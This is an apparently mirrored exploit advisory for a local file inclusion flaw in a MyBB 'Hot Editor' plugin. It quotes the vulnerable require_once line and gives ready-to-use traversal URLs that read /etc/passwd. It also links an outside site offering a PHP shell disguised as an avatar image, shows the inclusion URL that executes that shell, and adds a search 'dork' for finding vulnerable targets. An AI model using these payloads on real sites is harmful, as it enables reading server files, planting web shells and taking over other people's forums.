AOH :: Web BBS :: Frequently Exploited

AOH :: Web BBS :: Frequently Exploited :: TB10325.HTM
Mybb Hot Editor Plugin Local File Inclusion

Mybb Hot Editor Plugin Local File Inclusion Mybb Hot Editor Plugin Local File Inclusion


www.expw0rm.com 
Mail : liz0@expw0rm.com 
---------------------------------------
Vul. Code : keyboard.php line 3 


	require_once "./vk_code/$first";
----------------------------------------


*/

http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd 

And

upload php shell = > http://www.expw0rm.com/avatar_36.zip 

http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => target isn't show with ie.plese you use firefox 

Dork: "MTR Paket :"
?>

// Exploit Worm www.expw0rm.com 

orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-inclusion_no114.html

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.